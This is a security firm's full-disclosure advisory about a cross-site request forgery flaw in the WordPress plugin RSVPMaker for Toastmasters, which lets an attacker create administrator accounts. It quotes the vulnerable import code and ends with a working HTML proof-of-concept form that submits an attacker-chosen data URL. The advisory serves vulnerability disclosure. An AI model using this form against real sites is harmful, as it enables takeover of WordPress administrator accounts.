15 Oct

Full Disclosure of Cross-Site Request Forgery (CSRF)/User Import Vulnerability in RSVPMaker for Toastmasters

One of the ways we help to improve the security of WordPress plugins, not just for our customers, but for everyone using them, is the proactive monitoring of changes made to plugins in the Plugin Directory to try to catch serious vulnerabilities before they are exploited. While we have a number of automated checks that are used to try to spot the possibility of those, most of the vulnerabilities found so far have come from only two of those. Once again, though another one of those has caught a vulnerability. This time a cross-site request forgery (CSRF)/user import vulnerability in RSVPMaker for Toastmasters, which could allow an attacker to cause a logged in Administrator user to create another Administrator account that is controlled by the attacker.

When the plugin’s Import/Export page, /wp-admin/admin.php?page=import_export, is accessed code runs that can create new WordPress users based on the contents of an URL. There is no protection CSRF when doing that so if a hacker could get a logged in Administrator to access a page they control they could cause that to happen.

The code for that starts with this:

3868
3869
3870
if(isset($_POST['importurl']))
{
	$message = file_get_contents($_POST['importurl']);

Which gets data used to create the accounts from a URL specified with the POST input “importurl”.

Later in the code it creates user_meta database entries derived from that data:

3905
3906
3907
3908
3909
3910
3911
3912
3913
3914
3915
foreach($user->usermeta as $meta_key => $meta_value)
{
	//echo '< div>'.$meta_key.' value:< /div>';
	if(is_serialized($meta_value))
		$value = unserialize($meta_value);
	else
		$value = $meta_value;
	//print_r($value);
	//echo '< br />';
	update_user_meta($member_id,$meta_key,$value);
	$record_count++;

The role of the new users is specified by the “wp_capabilities” meta_key, so the new users can easily be set to be administrators.

Due to the moderators of the WordPress Support Forum’s continued inappropriate behavior we are full disclosing vulnerabilities in protest until WordPress gets that situation cleaned up, so we are releasing this post and then only trying to notify the developer through the WordPress Support Forum. Hopefully they will finally see the light and clean up their act soon, so these full disclosures will no longer be needed (we hope they end soon).

Proof of Concept

The following proof of concept will create new WordPress users based on data on the specified URL (a sample of the format for that can be found on the plugin’s Import/Export page), when logged in as an Administrator.

Make sure to replace “[path to WordPress]” with the location of WordPress and “[data URL]” with the URL where the data is stored.

<html>
<body>
<form action="http://[path to WordPress]/wp-admin/admin.php?page=import_export" method="POST" >
<input type="hidden" name="importurl" value="[data URL]" />
<input type="submit" value="Submit" />
</form>
</body>
</html>

Concerned About The Security of the Plugins You Use?

When you order a plugin security review from us we review the plugin for issues that hackers would exploit if the knew about them as well as making sure that that needed security checks have been implemented in the plugin. If you order two reviews you will receive free lifetime subscription to our service.

Leave a Reply

Your email address will not be published. Required fields are marked *